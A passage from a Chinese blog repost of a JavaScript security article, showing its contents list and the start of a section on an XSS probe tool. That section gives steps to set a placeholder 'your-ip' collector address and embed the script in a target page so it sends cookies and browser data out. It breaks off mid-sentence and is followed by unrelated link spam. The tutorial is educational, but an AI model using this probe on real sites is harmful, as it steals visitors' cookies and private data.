当前位置: 首页 > news >正文

【网络安全】从浏览器到服务端讲JavaScript安全

未经许可,不得转载。
原作者余弦,本文对原文进行二次创作。

文章目录

    • 基本隐私收集
      • XSS探针
      • JSON 劫持
    • 内网浅渗透
      • 内网IP获取
      • 内网IP端口获取
      • 内网主机存活获取
      • 路由Web控制台操作
      • 内网脆弱Web应用控制
    • 突破浏览器边界
    • XSS Virus攻击
    • MongoDB
      • 数组绕过注入攻击
      • MongoDB 查询条件绕过(Bypass)与 PHP 传参漏洞
      • JavaScript 注入攻击
    • node.js
      • 瘟神eval
      • 本地文件包含

基本隐私收集

XSS探针

项目地址:

https://github.com/evilcos/xssprobe

用途:获取目标网站的通用数据,包括 referer、location、toplocation、cookie、domain、title、screen、flash 、browser、ua、lang 等。

使用步骤

  1. 对 probe.js 进行修改,将 http_server 配置为自己的 probe.php 网址,格式如 http_server = “http://your-ip/xssprobe/probe.php?c=”; 。

  2. 在目标页面中嵌入 probe.js 脚本,具体操作可参考 demo.html。

例图:

在这里插入图片描述

JSON 劫持

JSON 是一种常用于数据交

相关文章:

  • 17网站一起做武汉推广系统
  • 苏宁网站开发人员工资广告推广计划
  • 在哪个网站上面可以接项目做常州网站推广公司
  • 网站打不开怎么做官方进一步优化
  • 长沙做网站设计公司网络营销策略
  • 用微信怎么做企业网站百度怎么推广自己的网站
  • 星型拓扑网络发生网络风暴
  • 鸿蒙ArkTS+ArkUI实现五子棋游戏
  • C++ 异常 【无敌详细版】
  • 用逻辑分析仪分析Usart波形
  • 如何使用ncurses库并在Linux上编译?
  • C++Primer学习(13.1 拷贝、赋值与销毁)
  • OSPF-8 OSPF特殊区域NSSA
  • 基于 FPGA的HLS技术与应用
  • 『 C++ 』多线程编程中的参数传递技巧
  • 23 种设计模式中的访问者模式
  • 【大模型算法工程】大模型应用工具化、忠诚度以及知识库场景下PDF双栏解析问题的讨论
  • 视点游动生成光照贴图
  • 3.21学习总结 Java字符串+Static关键字
  • AI Agent开发大全第一课-AI是什么以及如何使用AI
  • Unity代码中修改动画速度
  • Python 面向对象三大特性深度解析
  • C#与西门子PLC的六大通信库
  • VSCode中搜索插件显示“提取扩展时出错。Failed to fetch”问题解决!
  • java基础--序列化与反序列化的概念是什么?
  • 大数据学习(80)-数仓分层